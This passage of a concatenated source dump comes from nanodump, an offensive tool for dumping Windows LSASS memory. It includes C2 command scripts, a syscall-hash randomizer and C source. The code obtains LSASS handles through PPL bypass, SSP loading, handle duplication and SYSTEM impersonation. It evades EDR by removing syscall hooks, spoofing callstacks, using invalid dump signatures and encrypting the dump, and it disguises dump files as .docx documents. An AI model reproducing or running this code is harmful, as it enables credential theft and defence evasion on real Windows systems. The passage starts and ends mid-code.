    let dump_path = ax.agent_info(id, "computer") + "_" + ax.ticks() + ".dmp";
    let write_file = 0;
    let fork = 0;
    let snapshot = 0;
    let dup = 0;
    let use_valid_sig = 0;
    let spoof_callstack = 0;
    let use_lsass_shtinkering = 0;
    let elevate_handle = 0;
    let duplicate_elevate = 0;
    let chunk_size = 0xe1000;

    if(parsed_json["--getpid"]) { get_pid = 1; }
    if(parsed_json["--valid"]) { use_valid_sig = 1; }
    if(parsed_json["--fork"]) { fork = 1; }
    if(parsed_json["--snapshot"]) { snapshot = 1; }
    if(parsed_json["-d"]) { dup = 1; }
    if(parsed_json["-eh"]) { elevate_handle = 1; }
    if(parsed_json["-de"]) { duplicate_elevate = 1; }
    if(parsed_json["-sll"]) { use_seclogon_leak_local = 1; }
    if(parsed_json["-sk"]) { use_lsass_shtinkering = 1; }
    if(parsed_json["-sd"]) { use_seclogon_duplicate = 1; }
    if(parsed_json["-sc"]) { spoof_callstack = 1; }

    if("PID" in parsed_json) {
        pid = parsed_json["PID"];
    }
    if("SPE_DUMP_FOLDER" in parsed_json) {
        silent_process_exit = parsed_json["SPE_DUMP_FOLDER"];
        use_silent_process_exit = 1;
    }
    if("SLR_BIN_PATH" in parsed_json) {
        seclogon_leak_remote_binary = parsed_json["SLR_BIN_PATH"];
        use_seclogon_leak_remote = 1;
    }
    if("DUMP_PATH" in parsed_json) {
        dump_path = parsed_json["DUMP_PATH"];
        write_file = 1;
    }

    if( get_pid &&
        (write_file || use_valid_sig || snapshot || fork || elevate_handle || duplicate_elevate || use_seclogon_duplicate || spoof_callstack || use_seclogon_leak_local || use_seclogon_leak_remote || dup || use_silent_process_exit || use_lsass_shtinkering)
    ) { throw new Error("The parameter --getpid is used alone"); }

    if (use_silent_process_exit &&
        (write_file || use_valid_sig || snapshot || fork || elevate_handle || duplicate_elevate || use_seclogon_duplicate || spoof_callstack || use_seclogon_leak_local || use_seclogon_leak_remote || dup || use_lsass_shtinkering)
    ) { throw new Error("The parameter -spe is used alone"); }

    if( dup && elevate_handle ) { throw new Error("The options -d and -eh cannot be used together"); }
    if( duplicate_elevate && spoof_callstack ) { throw new Error("The options -de and -sc cannot be used together"); }
    if( dup && spoof_callstack ) { throw new Error("The options -d and -sc cannot be used together"); }
    if( dup && use_seclogon_duplicate ) { throw new Error("The options -d and -sd cannot be used together"); }
    if( elevate_handle && duplicate_elevate ) { throw new Error("The options -eh and -de cannot be used together"); }
    if( duplicate_elevate && dup ) { throw new Error("The options -de and -d cannot be used together"); }
    if( duplicate_elevate && use_seclogon_duplicate ) { throw new Error("The options -de and -sd cannot be used together"); }
    if( elevate_handle && use_seclogon_duplicate ) { throw new Error("The options -eh and -sd cannot be used together"); }
    if( dup && use_seclogon_leak_local ) { throw new Error("The options -d and -sll cannot be used together"); }
    if( elevate_handle && use_seclogon_leak_local ) { throw new Error("The options -eh and -sll cannot be used together"); }
    if( dup && use_seclogon_leak_remote ) { throw new Error("The options -d and -slr cannot be used together"); }
    if( duplicate_elevate && use_seclogon_leak_remote ) { throw new Error("The options -de and -slr cannot be used together"); }
    if( elevate_handle && use_seclogon_leak_remote ) { throw new Error("The options --eh and -slr cannot be used together"); }
    if( use_seclogon_leak_local && use_seclogon_leak_remote ) { throw new Error("The options -sll and -slr cannot be used together"); }
    if( use_seclogon_leak_local && use_seclogon_duplicate ) { throw new Error("The options -sll and -sd cannot be used together"); }
    if( use_seclogon_leak_local && spoof_callstack ) { throw new Error("The options -sll and -sc cannot be used together"); }
    if (use_seclogon_leak_remote && use_seclogon_duplicate) { throw new Error("The options -slr and -sd cannot be used together"); }
    if (use_seclogon_leak_remote && spoof_callstack) { throw new Error("The options -slr and -sc cannot be used together"); }
    if (use_seclogon_duplicate && spoof_callstack) { throw new Error("The options -sd and -sc cannot be used together"); }
    if (!use_lsass_shtinkering && use_seclogon_leak_local && !write_file) { throw new Error("If -sll is being used, you need to provide the dump path with -w"); }
    if (!use_lsass_shtinkering && use_seclogon_leak_local && !(/^[A-Za-z]:\\.*/.test(dump_path)) ) { throw new Error("If -sll is being used, you need to provide the full path: " + dump_path); }
    if (use_lsass_shtinkering && fork) { throw new Error("The options -sk and --fork cannot be used together"); }
    if (use_lsass_shtinkering && snapshot) { throw new Error("The options -sk and -ss cannot be used together"); }
    if (use_lsass_shtinkering && use_valid_sig) { throw new Error("The options -sk and --valid cannot be used together"); }
    if (use_lsass_shtinkering && write_file) { throw new Error("The options -sk and -w cannot be used together"); }

    // if($use_seclogon_leak_local)
    // {
    //     $folder = "C:\\Windows\\Temp";
    //     $seclogon_leak_remote_binary = $folder . "\\" .  generate_rand_string(5, 10) . ".exe";
    //     blog($1, "[!] An unsigned nanodump binary will be uploaded to: ". $seclogon_leak_remote_binary);
    //     $handle = openf(script_resource("_bin/nanodump." . $barch . ".exe"));
    //     $exe = readb($handle, -1);
    //     closef($handle);
    //     if(strlen($exe) == 0)
    //     {
    //         berror($1, "could not read exe file");
    //         return;
    //     }
    //     bupload_raw($1, $seclogon_leak_remote_binary, $exe);
    // }

    let bof_path = ax.script_dir() + "_bin/nanodump." + ax.arch(id) + ".o";
    let bof_params = ax.bof_pack("int,cstr,int,int,int,int,int,int,int,int,int,int,int,cstr,int,int,int,cstr,int", [pid, dump_path, write_file, chunk_size, use_valid_sig, fork, snapshot, dup, elevate_handle, duplicate_elevate, get_pid, use_seclogon_leak_local, use_seclogon_leak_remote, seclogon_leak_remote_binary, use_seclogon_duplicate, spoof_callstack, use_silent_process_exit, silent_process_exit, use_lsass_shtinkering ]);
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Running NanoDump BOF");
});





var cmd_nanodump_ppl_dump = ax.create_command("nanodump_ppl_dump", "Bypass PPL and dump LSASS", "nanodump_ppl_dump -d -w C:\\Windows\\Temp\\report.docx");
cmd_nanodump_ppl_dump.addArgFlagString( "-w", "DUMP_PATH", true, "Filename of the dump");
cmd_nanodump_ppl_dump.addArgBool(       "--valid",               "Create a dump with a valid signature");
cmd_nanodump_ppl_dump.addArgBool(       "-d",                    "Duplicate: a high privileged existing LSASS handle");

cmd_nanodump_ppl_dump.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)
{
    if( ax.is64(id) == false ) { throw new Error("WoW64 is not supported"); }

    if( ax.isadmin(id) == false ) { throw new Error("You need to be admin to run nanodump"); }

    let dll_path = ax.script_dir() + "_bin/nanodump_ppl_dump." + ax.arch(id) + ".dll";
    let dll = ax.file_read(dll_path);
    if(dll.length == 0) {
        throw new Error(`file ${dll_path} not readed`);
    }

    let dup = 0;
    let use_valid_sig = 0;
    let dump_path = parsed_json["DUMP_PATH"];

    if(parsed_json["--valid"]) { use_valid_sig = 1; }
    if(parsed_json["-d"]) { dup = 1; }

    if ( !(/^[A-Za-z]:\\.*/.test(dump_path)) ) { throw new Error("You need to provide the full path: " + dump_path); }

    let bof_path = ax.script_dir() + "_bin/nanodump_ppl_dump." + ax.arch(id) + ".o";
    let bof_params = ax.bof_pack("cstr,int,int,bytes", [dump_path, use_valid_sig, dup, dll]);
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Running NanoDumpPPLDump BOF");
});





var cmd_nanodump_ppl_medic = ax.create_command("nanodump_ppl_medic", "Bypass PPL and dump LSASS", "nanodump_ppl_dump -eh -w C:\\Windows\\Temp\\report.docx");
cmd_nanodump_ppl_medic.addArgFlagString( "-w", "DUMP_PATH", true, "Filename of the dump");
cmd_nanodump_ppl_medic.addArgBool(       "--valid",               "Create a dump with a valid signature");
cmd_nanodump_ppl_medic.addArgBool(       "-eh",                   "Elevate-handle: open a handle to LSASS with low privileges and duplicate it to gain higher privileges");

cmd_nanodump_ppl_medic.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)
{
    if( ax.is64(id) == false ) { throw new Error("WoW64 is not supported"); }

    if( ax.isadmin(id) == false ) { throw new Error("You need to be admin to run nanodump"); }

    let dll_path = ax.script_dir() + "_bin/nanodump_ppl_medic." + ax.arch(id) + ".dll";
    let dll = ax.file_read(dll_path);
    if(dll.length == 0) {
        throw new Error(`file ${dll_path} not readed`);
    }

    let elevate_handle = 0;
    let use_valid_sig = 0;
    let dump_path = parsed_json["DUMP_PATH"];

    if(parsed_json["--valid"]) { use_valid_sig = 1; }
    if(parsed_json["-eh"]) { elevate_handle = 1; }

    if ( !(/^[A-Za-z]:\\.*/.test(dump_path)) ) { throw new Error("You need to provide the full path: " + dump_path); }

    let bof_path = ax.script_dir() + "_bin/nanodump_ppl_medic." + ax.arch(id) + ".o";
    let bof_params = ax.bof_pack("bytes,cstr,int,int", [dll, dump_path, use_valid_sig, elevate_handle]);
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Running NanoDumpPPLMedic BOF");
});





var cmd_nanodump_ssp = ax.create_command("nanodump_ssp", "Load a Security Support Provider (SSP) into LSASS", "nanodump_ssp --write C:\\Windows\\Temp\\doc.docx");
cmd_nanodump_ssp.addArgFlagString( "-w", "DUMP_PATH",          true,  "Filename of the dump");
cmd_nanodump_ssp.addArgBool(       "--valid",                         "Create a dump with a valid signature");
cmd_nanodump_ssp.addArgFlagString( "--write-dll", "WRITE_DLL", false, "Path where to write the SSP DLL from nanodump (randomly generated if not defined)");
cmd_nanodump_ssp.addArgFlagString( "--load-dll",  "LOAD_DLL",  false, "Load an existing SSP DLL");

cmd_nanodump_ssp.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)
{
    if( ax.is64(id) == false ) { throw new Error("WoW64 is not supported"); }

    if( ax.isadmin(id) == false ) { throw new Error("You need to be admin to run nanodump"); }

    let use_valid_sig = 0;
    let write_dll_path = "";
    let load_dll_path = "";
    let dll = "";

    let dump_path = parsed_json["DUMP_PATH"];
    if ( !(/^[A-Za-z]:\\.*/.test(dump_path)) ) { throw new Error("You need to provide the full path: " + dump_path); }

    if(parsed_json["--valid"]) { use_valid_sig = 1; }
    if("WRITE_DLL" in parsed_json) { write_dll_path = parsed_json["WRITE_DLL"]; }
    if("LOAD_DLL" in parsed_json) { load_dll_path = parsed_json["LOAD_DLL"]; }

    if( load_dll_path.length && write_dll_path.length ) { throw new Error("The options --write-dll and --load-dll cannot be used together"); }
    if( load_dll_path.length && !(/^[A-Za-z]:\\.*/.test(load_dll_path)) ) { throw new Error("You need to provide the full path: " + load_dll_path); }

    if( write_dll_path.length ) {
        let dll_path = ax.script_dir() + "_bin/nanodump_ssp." + ax.arch(id) + ".dll";
        dll = ax.file_read(dll_path);
        if(dll.length == 0) {
            throw new Error(`file ${dll_path} not readed`);
        }
    }

    let bof_path = ax.script_dir() + "_bin/nanodump_ssp." + ax.arch(id) + ".o";
    let bof_params = ax.bof_pack("bytes,cstr,cstr,cstr,int", [dll, write_dll_path, load_dll_path, dump_path, use_valid_sig]);
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Running nanodump_ssp BOF");
});

================================================
FILE: Creds-BOF/nanodump/scripts/randomize_sw2_seed.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os
import re
import glob
import random
import struct


def get_old_seed():
    with open('include/syscalls.h') as f:
        code = f.read()
    match = re.search(r'#define SW2_SEED (0x[a-fA-F0-9]{8})', code)
    assert match is not None, 'SW2_SEED not found!'
    return match.group(1)


def replace_seed(old_seed, new_seed):
    with open('include/syscalls.h') as f:
        code = f.read()
    code = code.replace(
        f'#define SW2_SEED {old_seed}',
        f'#define SW2_SEED 0x{new_seed:08X}',
        1
    )
    with open('include/syscalls.h', 'w') as f:
        f.write(code)


def get_function_hash(seed, function_name, is_syscall=True):
    function_hash = seed
    function_name = function_name.replace('_', '')
    if is_syscall and function_name[:2] == 'Nt':
        function_name = 'Zw' + function_name[2:]
    name = function_name + '\0'
    ror8 = lambda v: ((v >> 8) & (2 ** 32 - 1)) | ((v << 24) & (2 ** 32 - 1))

    for segment in [s for s in [name[i:i + 2] for i in range(len(name))] if len(s) == 2]:
        partial_name_short = struct.unpack('<H', segment.encode())[0]
        function_hash ^= partial_name_short + ror8(function_hash)

    return function_hash


def replace_syscall_hashes(seed):
    with open('source/syscalls.c') as f:
        code = f.read()
    regex = re.compile(r'__declspec\(naked\) NTSTATUS (Nt[^(]+)')
    syscall_names = re.findall(regex, code)
    syscall_names = set(syscall_names)
    syscall_definitions = code.split('#elif defined(__GNUC__)')[4]

    for syscall_name in syscall_names:
        regex = re.compile('NTSTATUS ' + syscall_name + '\\(.*?"mov rcx, (0x[A-Fa-f0-9]{8})', re.DOTALL)
        match = re.search(regex, syscall_definitions)
        assert match is not None, f'hash of syscall {syscall_name} not found!'
        old_hash = match.group(1)
        new_hash = get_function_hash(seed, syscall_name)
        print(f'{syscall_name} -> {old_hash} - 0x{new_hash:08X}')
        code = code.replace(
            old_hash,
            f'0x{new_hash:08X}'
        )

    with open('source/syscalls.c', 'w') as f:
        f.write(code)

    with open('source/syscalls-asm.asm') as f:
        code = f.read()

    for syscall_name in syscall_names:
        regex = re.compile(syscall_name + ' PROC.*?mov rcx, 0([A-Fa-f0-9]{8})h', re.DOTALL)
        match = re.search(regex, code)
        assert match is not None, f'hash of syscall {syscall_name} not found!'
        old_hash = match.group(1)
        new_hash = get_function_hash(seed, syscall_name)
        code = code.replace(
            f'0{old_hash}h',
            f'0{new_hash:08X}h',
            1
        )

    with open('source/syscalls-asm.asm', 'w') as f:
        f.write(code)


def replace_dinvoke_hashes(seed):
    for header_file in glob.glob("include/**/*.h", recursive=True):
        with open(header_file) as f:
            code = f.read()
        regex = re.compile(r'#define (\w+)_SW2_HASH (0x[a-fA-F0-9]{8})')
        matches = re.findall(regex, code)
        for function_name, old_hash in matches:
            new_hash = get_function_hash(seed, function_name, is_syscall=False)
            code = code.replace(
                f'#define {function_name}_SW2_HASH {old_hash}',
                f'#define {function_name}_SW2_HASH 0x{new_hash:08X}',
                1
            )
        if matches:
            with open(header_file, 'w') as f:
                f.write(code)


def main():
    #new_seed = random.randint(2 ** 28, 2 ** 32 - 1)
    new_seed = 0x1337c0de
    fun = 'OpenSCManagerW'
    import sys
    fun = sys.argv[1]
    new_hash = get_function_hash(new_seed, fun, True)
    print(f'{fun}: 0x{new_hash:08X}')
    return

    old_seed = get_old_seed()
    replace_seed(old_seed, new_seed)
    replace_syscall_hashes(new_seed)
    replace_dinvoke_hashes(new_seed)
    if os.name == 'nt':
        print('done! recompile with:\nnmake -f Makefile.msvc')
    else:
        print('done! recompile with:\nmake -f Makefile')

if __name__ == '__main__':
    main()


================================================
FILE: Creds-BOF/nanodump/source/bin2c.c
================================================
#include <stdio.h>

int main(int argc, char** argv)
{
	if (argc != 3)
	{
		fprintf(stderr, "usage: %s <input file> <array name>\n", argv[0]);
		return 0;
	}

	FILE* f = fopen(argv[1], "rb");
	if (!f)
	{
		fprintf(stderr, "Invalid input file: %s\n", argv[1]);
		return -1;
	}

	printf("#pragma once\n\nunsigned char %s[] = {", argv[2]);

	unsigned long n = 0;
	unsigned char c;
	while(!feof(f))
	{
		if (!fread(&c, 1, 1, f))
			break;
		printf("0x%.2X,", (int)c);
		n++;
	}
	fclose(f);

	printf("};\n");
	printf("unsigned int %s_len = %ld;\n", argv[2], n);

	return 0;
}


================================================
FILE: Creds-BOF/nanodump/source/delete_file.c
================================================

#include "delete_file.h"
#ifdef BOF
 #include "utils.c"
 #include "syscalls.c"
#endif

// this is used to delete the nanodump DLL
VOID do_delete(
    IN LPSTR file_path)
{
    if (!file_exists(file_path))
    {
        PRINT_ERR("The file does not exists");
        return;
    }
    BOOL ok = delete_file(file_path);
    if (!ok)
    {
        PRINT_ERR("Could not delete the file");
        return;
    }
    PRINT("The file has been deleted");
    return;
}

#ifdef BOF

void go(char* args, int length)
{
    datap  parser;
    LPSTR ssp_path;

    BeaconDataParse(&parser, args, length);
    ssp_path = BeaconDataExtract(&parser, NULL);

    do_delete(ssp_path);
}

#else

int main(int argc, char* argv[])
{
    if (argc != 2)
    {
        printf("usage: %s <file path>\n", argv[0]);
        return -1;
    }

    do_delete(argv[1]);
    return 0;
}

#endif


================================================
FILE: Creds-BOF/nanodump/source/dinvoke.c
================================================
#include "dinvoke.h"

// used by spoof_callstack
PVOID find_dll_by_pointer(
    IN PVOID address)
{
    PND_PEB Peb = (PND_PEB)READ_MEMLOC(PEB_OFFSET);
    PND_PEB_LDR_DATA Ldr = Peb->Ldr;
    PVOID FirstEntry = &Ldr->InLoadOrderModuleList.Flink;
    PND_LDR_DATA_TABLE_ENTRY Entry = (PND_LDR_DATA_TABLE_ENTRY)Ldr->InLoadOrderModuleList.Flink;

    do
    {
        if ((ULONG_PTR)address >= (ULONG_PTR)Entry->DllBase &&
            (ULONG_PTR)address < RVA(ULONG_PTR, Entry->DllBase, Entry->SizeOfImage))
            return Entry->DllBase;

        Entry = (PND_LDR_DATA_TABLE_ENTRY)Entry->InLoadOrderLinks.Flink;
    } while (Entry != FirstEntry);

    DPRINT_ERR("Could not find the target DLL from the pointer 0x%p", address);

    return NULL;
}

/*
 * Check that hLibrary is indeed a DLL and not something else
 */
BOOL is_dll(
    IN HMODULE hLibrary)
{
    PIMAGE_DOS_HEADER dos;
    PIMAGE_NT_HEADERS nt;

    if (!hLibrary)
        return FALSE;

    dos = (PIMAGE_DOS_HEADER)hLibrary;

    // check the MZ magic bytes
    if (dos->e_magic != MZ)
        return FALSE;

    nt = RVA(PIMAGE_NT_HEADERS, hLibrary, dos->e_lfanew);

    // check the NT_HEADER signature
    if (nt->Signature != IMAGE_NT_SIGNATURE)
        return FALSE;

    // check that it is a DLL and not a PE
    USHORT Characteristics = nt->FileHeader.Characteristics;
    if ((Characteristics & IMAGE_FILE_DLL) != IMAGE_FILE_DLL)
        return FALSE;

    return TRUE;
}

/*
 * Look among all loaded DLLs for an export with certain function hash
 */
PVOID find_legacy_export(
    IN HMODULE hOriginalLibrary,
    IN DWORD fhash)
{
    PVOID addr;
    PND_PEB Peb = (PND_PEB)READ_MEMLOC(PEB_OFFSET);
    PND_PEB_LDR_DATA Ldr = Peb->Ldr;
    PVOID FirstEntry = &Ldr->InLoadOrderModuleList.Flink;
    PND_LDR_DATA_TABLE_ENTRY Entry = (PND_LDR_DATA_TABLE_ENTRY)Ldr->InLoadOrderModuleList.Flink;

    for (; Entry != FirstEntry; Entry = (PND_LDR_DATA_TABLE_ENTRY)Entry->InLoadOrderLinks.Flink)
    {
        // avoid looking in the DLL that brought us here
        if (Entry->DllBase == hOriginalLibrary)
            continue;

        // check if this DLL has an export with the function hash we are looking for
        addr = get_function_address(
            Entry->DllBase,
            fhash,
            0);
        if (!addr)
            continue;

        return addr;
    }

    return NULL;
}

/*
 * Follow the reference and return the real address of the function
 */
PVOID resolve_reference(
    IN HMODULE hOriginalLibrary,
    IN PVOID addr)
{
    HANDLE hLibrary;
    PVOID new_addr;
    LPCSTR api;

    // addr points to a string like: NewLibrary.NewFunctionName
    api = &strrchr(addr, '.')[1];
    DWORD dll_length = (DWORD)((ULONG_PTR)api - (ULONG_PTR)addr);
    char dll[MAX_PATH + 1] = {0};
    strncpy(dll, (LPCSTR)addr, dll_length);
    strncat(dll, "dll", MAX_PATH);
    wchar_t wc_dll[MAX_PATH] = {0};
    mbstowcs(wc_dll, dll, MAX_PATH);

    // try to find the library NewLibrary
    hLibrary = get_library_address(wc_dll, FALSE);
    if (!hLibrary)
    {
        // the library is not loaded, meaning it is a legacy DLL
        new_addr = find_legacy_export(
            hOriginalLibrary,
            SW2_HashSyscall(api));

        return new_addr;
    }

    // get the address of NewFunction in NewLibrary
    new_addr = get_function_address(
        hLibrary,
        SW2_HashSyscall(api),
        0);

    return new_addr;
}

/*
 * Find an export in a DLL
 */
PVOID get_function_address(
    IN HMODULE hLibrary,
    IN DWORD fhash,
    IN WORD ordinal)
{
    PIMAGE_DOS_HEADER       dos;
    PIMAGE_NT_HEADERS       nt;
    PIMAGE_DATA_DIRECTORY   data;
    PIMAGE_EXPORT_DIRECTORY exp;
    DWORD                   exp_size;
    PDWORD                  adr;
    PDWORD                  sym;
    PWORD                   ord;
    LPCSTR                  api;
    PVOID                   addr;

    if (!is_dll(hLibrary))
        return NULL;

    dos  = (PIMAGE_DOS_HEADER)hLibrary;
    nt   = RVA(PIMAGE_NT_HEADERS, hLibrary, dos->e_lfanew);
    data = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;

    if (!data->Size || !data->VirtualAddress)
        return NULL;

    exp      = RVA(PIMAGE_EXPORT_DIRECTORY, hLibrary, data->VirtualAddress);
    exp_size = data[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;

    adr = RVA(PDWORD, hLibrary, exp->AddressOfFunctions);
    sym = RVA(PDWORD, hLibrary, exp->AddressOfNames);
    ord = RVA(PWORD,  hLibrary, exp->AddressOfNameOrdinals);

    addr = NULL;
    if (fhash)
    {
        // iterate over all the exports
        for (DWORD i = 0; i < exp->NumberOfNames; i++)
        {
            api = RVA(LPCSTR, hLibrary, sym[i]);
            //addr = RVA(PVOID, hLibrary, adr[ord[i]]);
            //DPRINT("%lx -> %s -> 0x%llx", fhash, api, (ULONG_PTR)addr-(ULONG_PTR)hLibrary);
            if (fhash == SW2_HashSyscall(api))
            {
                addr = RVA(PVOID, hLibrary, adr[ord[i]]);
                break;
            }
        }
    }
    else
    {
        addr = RVA(PVOID, hLibrary, adr[ordinal - exp->Base]);
    }
    if (!addr)
        return NULL;

    // check if addr is a pointer to another function in another DLL
    if ((ULONG_PTR)addr >= (ULONG_PTR)exp &&
        (ULONG_PTR)addr <  RVA(ULONG_PTR, exp, exp_size))
    {
        // the function seems to be defined somewhere else
        addr = resolve_reference(
            hLibrary,
            addr);
    }
    return addr;
}

/*
 * Get the base address of a DLL
 */
HANDLE get_library_address(
    IN LPWSTR lib_path,
    IN BOOL DoLoad)
{
    PND_PEB Peb = (PND_PEB)READ_MEMLOC(PEB_OFFSET);
    PND_PEB_LDR_DATA Ldr = Peb->Ldr;
    PVOID FirstEntry = &Ldr->InLoadOrderModuleList.Flink;
    PND_LDR_DATA_TABLE_ENTRY Entry = (PND_LDR_DATA_TABLE_ENTRY)Ldr->InLoadOrderModuleList.Flink;
    BOOL is_full_path = wcsrchr(lib_path, '\\') ? TRUE : FALSE;

    do
    {
        if (is_full_path)
        {
            // the dll name was provided
            if (!_wcsicmp(lib_path, Entry->FullDllName.Buffer))
                return Entry->DllBase;
        }
        else
        {
            // the full path was provided
            if (!_wcsicmp(lib_path, Entry->BaseDllName.Buffer))
                return Entry->DllBase;
        }

        Entry = (PND_LDR_DATA_TABLE_ENTRY)Entry->InLoadOrderLinks.Flink;
    } while (Entry != FirstEntry);

    if (!DoLoad)
        return NULL;

    // the library is not currently loaded
    // get the address of LdrLoadDll
    LdrLoadDll_t LdrLoadDll = (LdrLoadDll_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, FALSE),
        LdrLoadDll_SW2_HASH,
        0);
    if (!LdrLoadDll)
    {
        api_not_found("LdrLoadDll");
        return NULL;
    }

    // create a UNICODE_STRING with the library name
    UNICODE_STRING ModuleFileName = { 0 };
    ModuleFileName.Buffer = lib_path;
    ModuleFileName.Length = (USHORT)wcsnlen(ModuleFileName.Buffer, MAX_PATH);
    ModuleFileName.Length *= 2;
    ModuleFileName.MaximumLength = ModuleFileName.Length + 2;

    // load the library
    HANDLE hLibrary = NULL;
    NTSTATUS status = LdrLoadDll(
        NULL,
        0,
        &ModuleFileName,
        &hLibrary);
    if (!NT_SUCCESS(status))
    {
        DPRINT_ERR(
            "Failed to load %ls, status: 0x%lx\n",
            lib_path,
            status);
        return NULL;
    }
    DPRINT("Loaded %ls at 0x%p", lib_path, hLibrary);

    return hLibrary;
}


================================================
FILE: Creds-BOF/nanodump/source/entry.c
================================================
#include "entry.h"

#ifdef BOF
 #include "nanodump.c"
#else
 #include "nanodump.h"
#endif

#if defined(NANO) && defined(BOF)

void go(char* args, int length)
{
    dump_context   dc = { 0 };
    datap          parser;
    DWORD          lsass_pid;
    LPCSTR         dump_path;
    BOOL           write_dump_to_disk;
    DWORD          chunk_size;
    BOOL           fork_lsass;
    BOOL           snapshot_lsass;
    BOOL           duplicate_handle;
    BOOL           elevate_handle;
    BOOL           duplicate_elevate;
    BOOL           use_valid_sig;
    BOOL           success = FALSE;
    BOOL           ret_val = FALSE;
    BOOL           get_pid_and_leave;
    BOOL           use_seclogon_leak_local;
    BOOL           use_seclogon_leak_remote;
    HANDLE         hProcess = NULL;
    BOOL           forked_lsass = FALSE;
    LPCSTR         seclogon_leak_remote_binary = NULL;
    BOOL           use_seclogon_duplicate;
    BOOL           use_silent_process_exit;
    LPCSTR         silent_process_exit;
    BOOL           use_lsass_shtinkering;
    BOOL           spoof_callstack;
    PPROCESS_LIST  created_processes = NULL;
    HANDLE         hSnapshot = NULL;
    WCHAR          wcFilePath[MAX_PATH];
    BOOL           running_as_system = FALSE;
    HANDLE         hImpersonate = NULL;
    UNICODE_STRING full_dump_path;
    SIZE_T         region_size = 0;
    PVOID          base_address = NULL;

    full_dump_path.Buffer        = wcFilePath;
    full_dump_path.Length        = 0;
    full_dump_path.MaximumLength = 0;

    dc.BaseAddress = NULL;
    dc.DumpMaxSize = 0;

    BeaconDataParse(&parser, args, length);
    lsass_pid = BeaconDataInt(&parser);
    dump_path = BeaconDataExtract(&parser, NULL);
    write_dump_to_disk = (BOOL)BeaconDataInt(&parser);
    chunk_size = BeaconDataInt(&parser);
    use_valid_sig = (BOOL)BeaconDataInt(&parser);
    fork_lsass = (BOOL)BeaconDataInt(&parser);
    snapshot_lsass = (BOOL)BeaconDataInt(&parser);
    duplicate_handle = (BOOL)BeaconDataInt(&parser);
    elevate_handle = (BOOL)BeaconDataInt(&parser);
    duplicate_elevate = (BOOL)BeaconDataInt(&parser);
    get_pid_and_leave = (BOOL)BeaconDataInt(&parser);
    use_seclogon_leak_local = (BOOL)BeaconDataInt(&parser);
    use_seclogon_leak_remote = (BOOL)BeaconDataInt(&parser);
    seclogon_leak_remote_binary = BeaconDataExtract(&parser, NULL);
    use_seclogon_duplicate = (BOOL)BeaconDataInt(&parser);
    spoof_callstack = (BOOL)BeaconDataInt(&parser);
    use_silent_process_exit = (BOOL)BeaconDataInt(&parser);
    silent_process_exit = BeaconDataExtract(&parser, NULL);
    use_lsass_shtinkering = (BOOL)BeaconDataInt(&parser);

    remove_syscall_callback_hook();

    success = enable_debug_priv();
    if (!success)
        goto cleanup;

    // if not provided, get the PID of LSASS
    if (!lsass_pid)
    {
        lsass_pid = get_lsass_pid();
        if (!lsass_pid)
            goto cleanup;
    }
    else
    {
        DPRINT("Using %ld as the PID of " LSASS, lsass_pid);
    }

    if (get_pid_and_leave)
    {
        PRINT(LSASS " PID: %ld", lsass_pid);
        return;
    }

    if (use_silent_process_exit)
    {
        if (!create_folder(silent_process_exit))
        {
            PRINT_ERR("The folder \"%s\" is not valid.", silent_process_exit);
            return;
        }
        // let the Windows Error Reporting process make the dump for us
        werfault_silent_process_exit(lsass_pid, silent_process_exit);
        return;
    }

    if (write_dump_to_disk)
    {
        get_full_path(&full_dump_path, dump_path);
        if (!create_file(&full_dump_path))
            goto cleanup;
    }

    if (elevate_handle || duplicate_elevate)
    {
        success = is_current_user_system(&running_as_system);
        if (!success)
            goto cleanup;

        if (!running_as_system)
        {
            DPRINT("The options --elevate-handle and --duplicate-elevate require SYSTEM, impersonating...");
            success = impersonate_system(&hImpersonate);
            if (!success)
                goto cleanup;
            DPRINT("Impersonating SYSTEM")
        }
    }

    success = obtain_lsass_handle(
        &hProcess,
        lsass_pid,
        duplicate_handle,
        elevate_handle,
        duplicate_elevate,
        use_seclogon_duplicate,
        spoof_callstack,
        FALSE,
        seclogon_leak_remote_binary,
        &created_processes,
        use_valid_sig,
        dump_path,
        fork_lsass,
        snapshot_lsass,
        &hSnapshot,
        use_seclogon_leak_local,
        use_seclogon_leak_remote,
        use_lsass_shtinkering);

    // delete the uploaded nanodump binary
    if (use_seclogon_leak_local)
        delete_file(seclogon_leak_remote_binary);

    if (!success)
        goto cleanup;

    if (use_seclogon_leak_local)
        return;

    if (use_lsass_shtinkering)
    {
        werfault_shtinkering(
            lsass_pid,
            hProcess);
        goto cleanup;
    }

    // set the signature
    if (use_valid_sig)
    {
        DPRINT("Using a valid signature");
        dc.Signature = MINIDUMP_SIGNATURE;
        dc.Version = MINIDUMP_VERSION;
        dc.ImplementationVersion = MINIDUMP_IMPL_VERSION;
    }
    else
    {
        DPRINT("Using a invalid signature");
        generate_invalid_sig(
            &dc.Signature,
            &dc.Version,
            &dc.ImplementationVersion);
    }

    // allocate a chuck of memory to write the dump
    region_size = DUMP_MAX_SIZE;
    base_address = allocate_memory(&region_size);
    if (!base_address)
        goto cleanup;

    dc.hProcess    = hProcess;
    dc.BaseAddress = base_address;
    dc.rva         = 0;
    dc.DumpMaxSize = region_size;

    success = NanoDumpWriteDump(&dc);
    if (!success)
        goto cleanup;

    DPRINT(
        "The dump was created successfully, final size: %d MiB",
        (dc.rva/1024)/1024);

    if (!use_valid_sig)
    {
        // at this point, you can encrypt or obfuscate the dump
        encrypt_dump(
            dc.BaseAddress,
            dc.rva);
    }

    if (write_dump_to_disk)
    {
        success = write_file(
            &full_dump_path,
            dc.BaseAddress,
            dc.rva);
    }
    else
    {
        success = download_file(
            chunk_size,
            dump_path,
            dc.BaseAddress,
            dc.rva);
    }

    if (!success)
        goto cleanup;

    print_success(
        dump_path,
        use_valid_sig,
        write_dump_to_disk);

    ret_val = TRUE;

cleanup:
    if (hProcess && forked_lsass)
        kill_process(0, hProcess);
    if (hProcess)
        NtClose(hProcess);
    if (dc.BaseAddress && dc.DumpMaxSize)
